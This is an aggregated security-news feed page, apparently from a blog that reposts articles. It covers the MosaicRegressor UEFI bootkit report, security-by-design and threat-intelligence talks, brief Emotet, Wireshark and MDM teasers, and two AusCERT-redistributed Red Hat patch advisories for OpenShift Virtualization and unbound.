“There was actually no evidence of [the HackingTeam rootkit’s] usage in the wild” until now, Lechtik said.

It was only a matter of time that an advanced threat group would employ the UEFI bootkit tool from HackingTeam. Jesse Michael, principal security researcher with Eclypsium, says he’s built proof-of-concept versions of the code in his own research to prove and study how it could be weaponized.

Bootkits are all about dwell time for an attacker, he says, even though they have not yet been widely used to date. This malware found by Kaspersky is based on “pretty simple code,” he says, and has plenty of room for enhancement. “There’s a lot you can do to take advantage of ” the UEFI bootkit, he says. “This just scratches the surface.”

The Kaspersky researchers say they weren’t able to pinpoint how the attackers were able to plant the bootkit on the victim machines and rewrite the legitimate UEFI firmware. They point to two possible scenarios: physical access to the victim machine akin to Hacking Team’s USB key tool. “Such a USB would contain a special update utility that can be generated with a designated builder provided by the company. We found a Q-flash update utility in our inspected firmware, which could have been used for such a purpose as well,” they wrote in a blog post.

Another option is via a remotely installed “patch” of the firmware with the malicious code. That would entail attacking the BIOS update authentication process to pull off.

The bootkit’s main job is to deploy malware in a targeted file directory, Lechtik said. “So when the operating system starts, this malware file will be executed.”

The attackers also appeared to have used the Winnti backdoor, a popular tool among Chinese nation-state groups. Kuznetsov said he and the team were able to get one of the DLL files, which turned out to be an information-stealing tool that had archived the contents of the recently accessed documents folder. “It suggested the whole campaign was related to espionage activities. But we don’t have evidence to have any clues about what is actually the target” information, he said. MosaicRegressor has no known ties to any other threat groups that Kaspersky tracks.

Fighting the Invisible Enemy
It’s not easy to even track these types of attacks because there’s little visibility into them, researchers say. So, how do you protect against a bootkit attack?

Encrypting the hard drive itself is one way to defend against such an attack, using Microsoft’s BitLocker, for example, Kaspersky says. There’s also Secure Boot, a feature supported on most modern computers that allows only securely signed firmware and software to boot up and run on a machine. Intel offers in its microprocessors the Secure Boot-based Intel Boot Guard, which protects UEFI firmware from tampering and malware.

“But if the motherboard is misconfigured and protections are not in place — if Boot Guard is not turned on — there are huge problems for any platform” that gets targeted, Kuznetsov said.

Michael says he worries that the bootkit capability ultimately be deployed in even more sophisticated attacks. For example, an attacker could watch and wait for a system protected by BitLocker to unlock, and then “patch” the system with bootkit malware.

Kelly Jackson Higgins is the Executive Editor of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Recommended Reading:

Comment |

Email This |

Print |

RSS

More Insights

Webcasts

Quantifying the Benefits of a DevOps Strategy

More Webcasts

White Papers

The High Cost of Poor Web Performance

More White Papers

Reports

InformationWeek & Network Computing Report Round Up

Online Threats — and What Your Org Can Do About Them

More Reports

The post Rare Firmware Rootkit Discovered Targeting Diplomats, NGOs appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/rare-firmware-rootkit-discovered-targeting-diplomats-ngos/?utm_source=rss&utm_medium=rss&utm_campaign=rare-firmware-rootkit-discovered-targeting-diplomats-ngos

3 Ways Companies are Working on Security by Design

Execs from top financial organizations and other companies share insights on building a security culture.

As cybersecurity professionals seek to bolster security culture across the enterprise, the concept of security by design has grown in prominence.

It has several interpretations: baking security fundamentals into development requirements, building less obtrusive security features for the convenience of customers, improving usability of security tools within IT organizations, or all of the above. But security by design stands at the forefront of security’s role in digital transformation.

To kick off Cybersecurity Awareness Month, the National Cyber Security Alliance yesterday held a virtual 2020 Cybersecurity Summit that featured luminaries from a number of organizations, including NIST, Bank of America, and Nasdaq. The big theme of the day was how security by design can aid in rolling out more usable security–for customers, internal users, technologists, and security personnel.

Here’s what the speakers there shared on how companies today are working on security by design:

Building Usable Software Securely

One of the highlights of the summit was a session led by Hari Gopalkrishnan, the client-facing platforms technology executive for Bank of America, who discussed the development of the firm’s virtual financial assistant, Erica. An AI-driven platform, Erica was developed from the outset with security by design principals as a core part of success requirements.

“One of the key tenets before we got to anything functional was the fact that it had to be secure by design because to us security and privacy are table stakes,” Gopalkrishnan explained.

An obvious part of that was baking security into the design lifecycle, ensuring that data flows are secure, authentication is appropriate, and so on. Additionally, AppSec best practices like code scanning and security testing of deployed software continue to remain top of mind. Other less obvious parts of the security by design ethos that has driven Erica’s development also included examining AI modeling for potential bias, as well as building robust options for customers to opt in or out of privacy-impacting choices around things like geolocation and data use.

This is huge in an era of using digital information for personalization and tailored services.

“Some could argue a lot of, wow, wouldn’t it be delightful if you could use all the data available to you, and when you be able to create a bigger aha moment for a customer, if you did that, and the answer is maybe, but we don’t get to do that,” Gopalkrishnan said. “And that’s not the role that we play. When we think about responsibility in software development and responsibility as a bank to deliver to our customers, everything needs to be transparent.”

Making Security Features Frictionless

Strengthening security functionality while removing friction from the user experience is a huge part of security by design. While security transparency is important, the goal should be to abstract security actions away from the users where possible, said Roman Shapiro, director of information security for Nasdaq.

“Candidly, I think the industry is playing a little bit of catch-up in this regard, but we’ve learned to look closely at usage patterns — where you are logging in from, how you are logging in, and so on — taking sensible steps behind the scenes to give you the assurance you need that the session you’re establishing is one you have confidence in,” Shapiro says.

Multi-factor authentication is one of the biggest friction points for users, agreed Steve Clark, managing director and business unit information security officer for Bank of America. Clark explained that AI analytics of user patterns for the sake of authentication and authorization is increasingly going to become prevalent to reduce friction on that front, both in finance and in other industries.

Improving the Usability of Security Data

As security teams monitor how users are interacting with software assets and data on a daily basis, security by design will be crucial for setting security operators up for success as well. This means that teams are thinking closely about how the systems log user activity, what data is pulled from them and made available to SOC analysts, and how it is contextualized and enriched.

“What’s difficult to do is pulling out the signal from the noise,” explained Brian Vecci, field CTO for Varonis. “The next few years are going to be not necessarily aggregating more log information or more information. It’s going to be doing two things, creating more usable profiling that combines different kinds of information, not just logs, but other metadata that we have about users’ data, the devices that are being used, where people are coming from, the services that they’re using, the access and building really useful profiles about what’s normal to identify patterns of misbehavior.”

Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading. View Full Bio

Recommended Reading:

Comment |

Email This |

Print |

RSS

More Insights

Webcasts

[Free Virtual Event] Managing Apps in a Multi-Cloud Environment

More Webcasts

White Papers

The High Cost of Poor Web Performance

More White Papers

Reports

InformationWeek & Network Computing Report Round Up

State of Endpoint Security: How Enterprises Are Managing Endpoint Security Threats

More Reports

The post 3 Ways Companies are Working on Security by Design appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/3-ways-companies-are-working-on-security-by-design/?utm_source=rss&utm_medium=rss&utm_campaign=3-ways-companies-are-working-on-security-by-design

Cyber Intelligence Suffers From ‘Snobby’ Isolationism, Focus on Rare Threats

Cyber-threat intelligence groups need to more often investigate their organization’s specific threats and better integrate with other business groups, experts say.

Cyber-threat intelligence (CTI) teams face a host of challenges — a shortage of skilled workers and a lack of resources, for example — but two of the most serious hurdles are, in many ways, self-inflicted: A “snobby” culture that isolates groups and often focuses on the latest interesting threats rather than the actual dangers facing the business, cybersecurity experts told attendees at two industry conferences last week.

Focusing on zero-day exploits and nation-state adversaries is naturally alluring for CTI teams, but the more common threats facing their organizations are cybercriminal phishing attacks and workers’ reuse of passwords, Xena Olsen, a cyber-threat analyst for Marymount University, said during a presentation on creating adversary detection pipelines at the virtual Black Hat Asia conference. To provide actionable intelligence for blue and red teams, CTI analysts should focus on the most common threats first, she said.

“Instead of looking what is actually going on in their network and threat landscape, some CTI analysts solely focus on public threat actor reporting and going for the sexy APTs, advanced persistent threats,” Olsen said, adding, “One of the main goals of adversary detection pipelines is to get really good at understanding simple attacks specific to your org[anization]’s infrastructure, controls, and detection.”

In addition, because CTI teams often collect some of the most knowledgeable security analysts into a group, they often isolate themselves from other departments in an organization. Instead, they need to become more accessible to the organization, otherwise the perception is that they are being “snobby,” Jamie Collier, CTI consultant at FireEye Mandiant, said in a presentation at the annual Virus Bulletin conference.

“It is really important that we get beyond that culture,” he said. “When it comes to someone who is ignorant about cybersecurity, and they read an article that stokes fears, there is nothing funny about that situation, and so we need to make sure we are helping these people.”

Almost half of all companies with a security-response capability have a dedicated CTI team, but the most popular forms of information consumed by the groups were open source CTI feeds, commercial feeds, and information from industry sharing groups, according to the “2020 SANS Cyber Threat Intelligence Survey.” Threat information based on internal log data from firewalls and endpoint systems ranked No. 5. Other internal sources of threat information ranked even lower.

The two cybersecurity experts presented their own critiques of CTI at the conference. Marymount University’s Olsen recommended an approach to threat intelligence that focuses on what is happening inside a company — gathering data on threats seen in email and enriching that with other internal event information — before attempting to use external threat information.

FireEye’s Collier focused on a “backcasting” scenario, where he assumed that the CTI industry failed in a decade and attempted to explain why. The top reasons: focusing on novel threats rather than the ones with the most impact, the isolationism of threat intelligence groups, and the overall skills shortage in the industry.

“They typically operate as almost a standalone function,” he said, speaking in the past tense, as his scenario deconstructed what happened to CTI from a future date. “We would have these very well written threat intelligence reports that would be produced on a variety of topics, but the audience of these reports was never clearly formulated. It was almost intelligence for the sake of intelligence.”

The allure of novel threats — both because they piqued the interest of researchers and made good marketing — poses another problem for CTI firms, he said. One reason is that threat intelligence has often become more a marketing exercise than a capability to provide actionable information to the business. Threat intelligence teams tend to focus on the novel and interesting threats — often looking to get media coverage — rather than the actual common threats for which companies have to be ready, Collier said.

“Between phishing, on one hand, and AI-enabled offense on the other, there is all these different attack vectors, but they pose really different threats,” he said. “AI-enabled threats may be interesting, but it is phishing that presents the real concern for the majority of organizations.”

Adversary detection pipelines are an approach for CTI teams to analyze the operational data coming from their own company to narrow down their focus to actual threats. Email and log files can give information on real threat that can then be enriched with information from other systems, and then open source threat intelligence can be used to gather more data on adversaries, Marymount University’s Olsen said.

The whole point it to “provide a prioritized workflow based on the attacks directed at the organization, through analysis performed by the CTI analyst,” Olsen said. “It is the focused creation of intelligence based upon specific requirements for the sole purpose of enriching other teams and improving the security posture of the organization.”

Collier advised threat intelligence teams to take a good look at how they approach their analyses.

“CTI is quite a young industry, so we need to guard against complacency,” he said. “We need to be really reflective as an industry.”

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Recommended Reading:

Comment |

Email This |

Print |

RSS

More Insights

Webcasts

Quantifying the Benefits of a DevOps Strategy

More Webcasts

White Papers

The High Cost of Poor Web Performance

More White Papers

Reports

InformationWeek & Network Computing Report Round Up

Annual Threat Intelligence Report: Perspectives and Predictions

More Reports

The post Cyber Intelligence Suffers From ‘Snobby’ Isolationism, Focus on Rare Threats appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/cyber-intelligence-suffers-from-snobby-isolationism-focus-on-rare-threats/?utm_source=rss&utm_medium=rss&utm_campaign=cyber-intelligence-suffers-from-snobby-isolationism-focus-on-rare-threats

Feds Sound Alarm Over Emotet Attacks on State, Local Govs

CISA warned already-strained public-sector entities about disturbing spikes in Emotet phishing attacks aimed at municipalities.
Read More

The post Feds Sound Alarm Over Emotet Attacks on State, Local Govs appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/feds-sound-alarm-over-emotet-attacks-on-state-local-govs/?utm_source=rss&utm_medium=rss&utm_campaign=feds-sound-alarm-over-emotet-attacks-on-state-local-govs

Community ID support for Wireshark

By Christian Kreibich, Principal Engineer, Corelight The past few weeks have seen several developments around Community ID, our open standard for rendering network traffic flow tuples into a concise textual representation. I’d like to summarize them in this blog post. We introduced Community ID in 2018 to simplify the correlation of network traffic logs across…Read more »

The post Community ID support for Wireshark appeared first on Security Boulevard.

Read More

The post Community ID support for Wireshark appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/community-id-support-for-wireshark/?utm_source=rss&utm_medium=rss&utm_campaign=community-id-support-for-wireshark

MDM as a Microservice

With MDM becoming a requirement for macOS Big Sur, the prospect of MDM as a microservice gives IT admins flexibility while keeping devices secure.

The post MDM as a Microservice appeared first on JumpCloud.

The post MDM as a Microservice appeared first on Security Boulevard.

Read More

The post MDM as a Microservice appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/mdm-as-a-microservice/?utm_source=rss&utm_medium=rss&utm_campaign=mdm-as-a-microservice

ESB-2020.3461 – [RedHat] Red Hat OpenShift Virtualization: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.3461
                   OpenShift Virtualization 2.4.2 Images
                              7 October 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Red Hat OpenShift Virtualization
Publisher:         Red Hat
Operating System:  Red Hat Enterprise Linux Server 7
                   Red Hat Enterprise Linux WS/Desktop 7
                   Red Hat Enterprise Linux Server 8
                   Red Hat Enterprise Linux WS/Desktop 8
Impact/Access:     Execute Arbitrary Code/Commands -- Existing Account            
                   Increased Privileges            -- Remote with User Interaction
                   Access Privileged Data          -- Existing Account            
                   Modify Arbitrary Files          -- Remote with User Interaction
                   Denial of Service               -- Remote with User Interaction
                   Access Confidential Data        -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-16845 CVE-2020-15586 CVE-2020-14365
                   CVE-2020-14352 CVE-2020-12825 CVE-2020-12402
                   CVE-2019-17023 CVE-2019-17006 CVE-2019-11756

Reference:         ESB-2020.3352
                   ESB-2020.3351
                   ESB-2020.3156
                   ESB-2020.3073
                   ESB-2020.3071
                   ESB-2020.3070

Original Bulletin: 
   https://access.redhat.com/errata/RHSA-2020:4201

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Low: OpenShift Virtualization 2.4.2 Images
Advisory ID:       RHSA-2020:4201-01
Product:           Container-native Virtualization
Advisory URL:      https://access.redhat.com/errata/RHSA-2020:4201
Issue date:        2020-10-06
CVE Names:         CVE-2019-11756 CVE-2019-17006 CVE-2019-17023 
                   CVE-2020-12402 CVE-2020-12825 CVE-2020-14352 
                   CVE-2020-14365 CVE-2020-15586 CVE-2020-16845 
=====================================================================

1. Summary:

Red Hat OpenShift Virtualization release 2.4.2 is now available with
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact
of Low. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.

2. Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for
Red Hat OpenShift Container Platform.

Security Fix(es):

* golang: data race in certain net/http servers including ReverseProxy can
lead to DoS (CVE-2020-15586)

* golang: ReadUvarint and ReadVarint can read an unlimited number of bytes
from invalid inputs (CVE-2020-16845)

For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.

Bug Fix(es):

* Container-native Virtualization 2.4.2 Images (BZ#1877407)

This advisory contains the following OpenShift Virtualization 2.4.2 images:

RHEL-7-CNV-2.4
==============
kubevirt-ssp-operator-container-v2.4.2-2

RHEL-8-CNV-2.4
==============
virt-cdi-controller-container-v2.4.2-1
virt-cdi-apiserver-container-v2.4.2-1
hostpath-provisioner-operator-container-v2.4.2-1
virt-cdi-uploadproxy-container-v2.4.2-1
virt-cdi-cloner-container-v2.4.2-1
virt-cdi-importer-container-v2.4.2-1
kubevirt-template-validator-container-v2.4.2-1
hostpath-provisioner-container-v2.4.2-1
virt-cdi-uploadserver-container-v2.4.2-1
virt-cdi-operator-container-v2.4.2-1
virt-controller-container-v2.4.2-1
kubevirt-cpu-model-nfd-plugin-container-v2.4.2-1
virt-api-container-v2.4.2-1
ovs-cni-marker-container-v2.4.2-1
kubevirt-cpu-node-labeller-container-v2.4.2-1
bridge-marker-container-v2.4.2-1
kubevirt-metrics-collector-container-v2.4.2-1
kubemacpool-container-v2.4.2-1
cluster-network-addons-operator-container-v2.4.2-1
ovs-cni-plugin-container-v2.4.2-1
kubernetes-nmstate-handler-container-v2.4.2-1
cnv-containernetworking-plugins-container-v2.4.2-1
virtio-win-container-v2.4.2-1
virt-handler-container-v2.4.2-1
virt-launcher-container-v2.4.2-1
cnv-must-gather-container-v2.4.2-1
virt-operator-container-v2.4.2-1
vm-import-controller-container-v2.4.2-1
hyperconverged-cluster-operator-container-v2.4.2-1
vm-import-operator-container-v2.4.2-1
kubevirt-vmware-container-v2.4.2-1
kubevirt-v2v-conversion-container-v2.4.2-1
kubevirt-kvm-info-nfd-plugin-container-v2.4.2-1
node-maintenance-operator-container-v2.4.2-1
hco-bundle-registry-container-v2.4.2-15

3. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS
1867099 - CVE-2020-16845 golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs
1869194 - HCO CR display name should contain "OpenShift Virtualization" instead of CNV
1869734 - OpenShift Virtualization does not appear in OperatorHub when filtering to "Disconnected"
1875383 - terminationGracePeriodSeconds should be updated in VMs created from common templates
1877407 - Container-native Virtualization 2.4.2 Images

5. References:

https://access.redhat.com/security/cve/CVE-2019-11756
https://access.redhat.com/security/cve/CVE-2019-17006
https://access.redhat.com/security/cve/CVE-2019-17023
https://access.redhat.com/security/cve/CVE-2020-12402
https://access.redhat.com/security/cve/CVE-2020-12825
https://access.redhat.com/security/cve/CVE-2020-14352
https://access.redhat.com/security/cve/CVE-2020-14365
https://access.redhat.com/security/cve/CVE-2020-15586
https://access.redhat.com/security/cve/CVE-2020-16845
https://access.redhat.com/security/updates/classification/#low

6. Contact:

The Red Hat security contact is . More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2020 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBX30EmtzjgjWX9erEAQgnhg/+Kw8PF1VdWqLhdnth6BBrjcI0qoGVd671
KqomXg22a9lJ+oFUqV8AV7FssyqRe5XDufdREbO7Q5QFJnLZh9sbvpJvmINA4/En
FX3caimjz5YQsTVJfDme/aHv8dfyqkjhd5hVRVHDjdZ/xagXqTB7qkA7H9IaHsMd
dLc4QHFIRCw3i+AUo6OLhnxIwkkDToTM6saoSscK5ePnze8t+dA2E2yk7n2NcB6n
djRONbWQ9am8/plK8QfeNHxpq6Yv9dXQMc8OqRPDN5Tytz4JSfW3isqhWSSzj7dd
D0nT6kpeeOD7a9tXkI1/J4e9UHY22oKaCBtgtzruba86yI5Imuq10tsn4Cmvn0hj
Frj7CwIy88vEq0WXUWY0P99a//pCJE5YozzJZWnqdEUb7xxyGWBtVzEGAcdIOT3o
BN5g5AYMjDXpShDDw24U2DCbCt0f9snZDqIXurL5PkcQyGq0CPjHjglhy5JrKes+
VY3LJa/bkT38RRXk/TzKrlPjxoJNXjhGqU8YdrTe4DGTTiCfE+CGQ5f5RObFt1Pp
UtbGikSRlso8P3Fu93unPgnqd1S8p3nVoYtAcUrMa+2CzjxpIN2OV/zmfl49tytf
q2sG6oiDTYtEMpGKiy5UQRLD9njJxNBHH+HD85SeSNfBwbnJeebfw9nLd7HJj3Ld
yrKxjSoHgxw=
=LVFp
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBX30SguNLKJtyKPYoAQjJVQ/9FlPPi/w/BuW2Qi7kLiGGArnHLBUcBkZr
/Mi9SFETjoB3TPySuOBfk/wdbLCtcxTzMDGghXHefvB2uyjELtF3VREpYPXZyQxm
si+NDblTdXWhQ3fOq6j4JsnqKzitOOF5ape82/5C7LhNjdRZAtlOFD6mVM8b83DU
3YfDVMf+sC2gorEP8mcTP7jT8isQJs7Cw5rKZy+cexdk6ZlWsefyUgOO2gQKtd3f
ash7sm9l1aNEJAvsAeSsoWMi7agXWkWNYQZFVbfUi50RyWkLyReP2kNEP+r7PeQJ
bDNyZ+AgJ8qf+U9IK+YsbiQYub7F6RvF4yC1L5ROVW15I4yZHoup7502j4bzyKqM
YUq328e/Sio9nCHE6pbXHp8FUspEt9a6o1mX5Lx7lhQO9fomzUvmCu1Y4Oxrdq5g
Vzm88Bilax0wZ9DDsUQ6eCqslnXVKOxi3i7+512Ef9o4rJQFLNyPS7EpeDnLzULa
F3pMVBfRXbPmo6YuUVVTU/1Ix9sBYmZ1nAqk6XYKKTF+CEIvmcMl3KUYNDI4VRTj
vkuxKHG+/L7PD5bRAJnM1CQAOyUll8cIX3CS+kirhRCJJJ6XA+Y4d3H1HJcaDKMQ
kSGXJQY1S9yoPRCIDvYMOpU1/HbLTTp38ThYn/SuN6bIHgz0a0/t36XFd9m3vD1L
e5uL9BzRHUI=
=eSwz
-----END PGP SIGNATURE-----

Read More

The post ESB-2020.3461 – [RedHat] Red Hat OpenShift Virtualization: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/esb-2020-3461-redhat-red-hat-openshift-virtualization-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2020-3461-redhat-red-hat-openshift-virtualization-multiple-vulnerabilities

ESB-2020.3460 – [RedHat] unbound: Denial of service – Remote/unauthenticated

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.3460
                          unbound security update
                              7 October 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           unbound
Publisher:         Red Hat
Operating System:  Red Hat Enterprise Linux Server 7
                   Red Hat Enterprise Linux WS/Desktop 7
Impact/Access:     Denial of Service -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-12663 CVE-2020-12662 

Reference:         ESB-2020.2336
                   ESB-2020.2163

Original Bulletin: 
   https://access.redhat.com/errata/RHSA-2020:4181

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: unbound security update
Advisory ID:       RHSA-2020:4181-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2020:4181
Issue date:        2020-10-06
CVE Names:         CVE-2020-12662 CVE-2020-12663 
=====================================================================

1. Summary:

An update for unbound is now available for Red Hat Enterprise Linux 7.7
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux ComputeNode EUS (v. 7.7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.7) - x86_64
Red Hat Enterprise Linux Server EUS (v. 7.7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional EUS (v. 7.7) - ppc64, ppc64le, s390x, x86_64

3. Description:

The unbound packages provide a validating, recursive, and caching DNS or
DNSSEC resolver. 

Security Fix(es):

* unbound: amplification of an incoming query into a large number of
queries directed to a target (CVE-2020-12662)

* unbound: infinite loop via malformed DNS answers received from upstream
servers (CVE-2020-12663)

For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1837597 - CVE-2020-12662 unbound: amplification of an incoming query into a large number of queries directed to a target
1837604 - CVE-2020-12663 unbound: infinite loop via malformed DNS answers received from upstream servers

6. Package List:

Red Hat Enterprise Linux ComputeNode EUS (v. 7.7):

Source:
unbound-1.6.6-2.el7_7.src.rpm

x86_64:
unbound-debuginfo-1.6.6-2.el7_7.i686.rpm
unbound-debuginfo-1.6.6-2.el7_7.x86_64.rpm
unbound-libs-1.6.6-2.el7_7.i686.rpm
unbound-libs-1.6.6-2.el7_7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.7):

x86_64:
unbound-1.6.6-2.el7_7.x86_64.rpm
unbound-debuginfo-1.6.6-2.el7_7.i686.rpm
unbound-debuginfo-1.6.6-2.el7_7.x86_64.rpm
unbound-devel-1.6.6-2.el7_7.i686.rpm
unbound-devel-1.6.6-2.el7_7.x86_64.rpm
unbound-python-1.6.6-2.el7_7.x86_64.rpm

Red Hat Enterprise Linux Server EUS (v. 7.7):

Source:
unbound-1.6.6-2.el7_7.src.rpm

ppc64:
unbound-1.6.6-2.el7_7.ppc64.rpm
unbound-debuginfo-1.6.6-2.el7_7.ppc.rpm
unbound-debuginfo-1.6.6-2.el7_7.ppc64.rpm
unbound-libs-1.6.6-2.el7_7.ppc.rpm
unbound-libs-1.6.6-2.el7_7.ppc64.rpm

ppc64le:
unbound-1.6.6-2.el7_7.ppc64le.rpm
unbound-debuginfo-1.6.6-2.el7_7.ppc64le.rpm
unbound-libs-1.6.6-2.el7_7.ppc64le.rpm

s390x:
unbound-1.6.6-2.el7_7.s390x.rpm
unbound-debuginfo-1.6.6-2.el7_7.s390.rpm
unbound-debuginfo-1.6.6-2.el7_7.s390x.rpm
unbound-libs-1.6.6-2.el7_7.s390.rpm
unbound-libs-1.6.6-2.el7_7.s390x.rpm

x86_64:
unbound-1.6.6-2.el7_7.x86_64.rpm
unbound-debuginfo-1.6.6-2.el7_7.i686.rpm
unbound-debuginfo-1.6.6-2.el7_7.x86_64.rpm
unbound-libs-1.6.6-2.el7_7.i686.rpm
unbound-libs-1.6.6-2.el7_7.x86_64.rpm

Red Hat Enterprise Linux Server Optional EUS (v. 7.7):

ppc64:
unbound-debuginfo-1.6.6-2.el7_7.ppc.rpm
unbound-debuginfo-1.6.6-2.el7_7.ppc64.rpm
unbound-devel-1.6.6-2.el7_7.ppc.rpm
unbound-devel-1.6.6-2.el7_7.ppc64.rpm
unbound-python-1.6.6-2.el7_7.ppc64.rpm

ppc64le:
unbound-debuginfo-1.6.6-2.el7_7.ppc64le.rpm
unbound-devel-1.6.6-2.el7_7.ppc64le.rpm
unbound-python-1.6.6-2.el7_7.ppc64le.rpm

s390x:
unbound-debuginfo-1.6.6-2.el7_7.s390.rpm
unbound-debuginfo-1.6.6-2.el7_7.s390x.rpm
unbound-devel-1.6.6-2.el7_7.s390.rpm
unbound-devel-1.6.6-2.el7_7.s390x.rpm
unbound-python-1.6.6-2.el7_7.s390x.rpm

x86_64:
unbound-debuginfo-1.6.6-2.el7_7.i686.rpm
unbound-debuginfo-1.6.6-2.el7_7.x86_64.rpm
unbound-devel-1.6.6-2.el7_7.i686.rpm
unbound-devel-1.6.6-2.el7_7.x86_64.rpm
unbound-python-1.6.6-2.el7_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2020-12662
https://access.redhat.com/security/cve/CVE-2020-12663
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is . More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2020 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBX3x91tzjgjWX9erEAQh8yQ/+JniFH29Ey6j/LS6CC/x+to5XSCMxttAm
HXP5Zq3I64/dZ6Kc3dTcmqG70qZpO5jQMBzL6nYMSRFC+s4wHcdN+KzevQa3gYvm
nVqHFlijnDXf+WkvXi1nOHhjGhLWv9qGP6NDmk2IauqQOlF+esQuzos1INgVEnX7
LrDwGG7XrZLpzLk3MVf3qymkAhCuTztAy44iOvO8r1cKARCa+EofzzB3tuF+tLPP
tq22OnfIYWijfRLPzxxF6Xd7a5E8oHbq1hjpD8M/sKfRAycvslQwtytLQHHLYyCH
zOI1VwWAXfpxDVIg8msg8LGre7sVmD5DvZl91xCGJuO1kYf6wpKL0ycg/6Ehw4ga
0BwdGACXZ3sk3GHDY2Bs4DtQVSUh6gqm599LxTqzTFc9zMbxfp+btVIqwBNlv43E
qj7GCkz80+yTLi6LdSeciIFnI4MR0/nLR+r/5RBn8VZuKHDNztRuy/IXQagqft4s
kOrhamnULnRlkIoSWcqgSjYh2F8OCAqmkxgmHUP7eGddTpB3BDmBvAkvn45rgGr5
Ql1ENAJM9Ez5AQQ2wtUmdhi5fzbcys88k8ld+7RXaWzfznrfbtfOIyCbi1Nhkuta
4fupsatyvBmzZXHErFopGLIDIGT917OspRvD7GJkA81v/KW1bTBE/L5CdAoqsqj1
ZDpcY+u1KaQ=
=Eet1
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

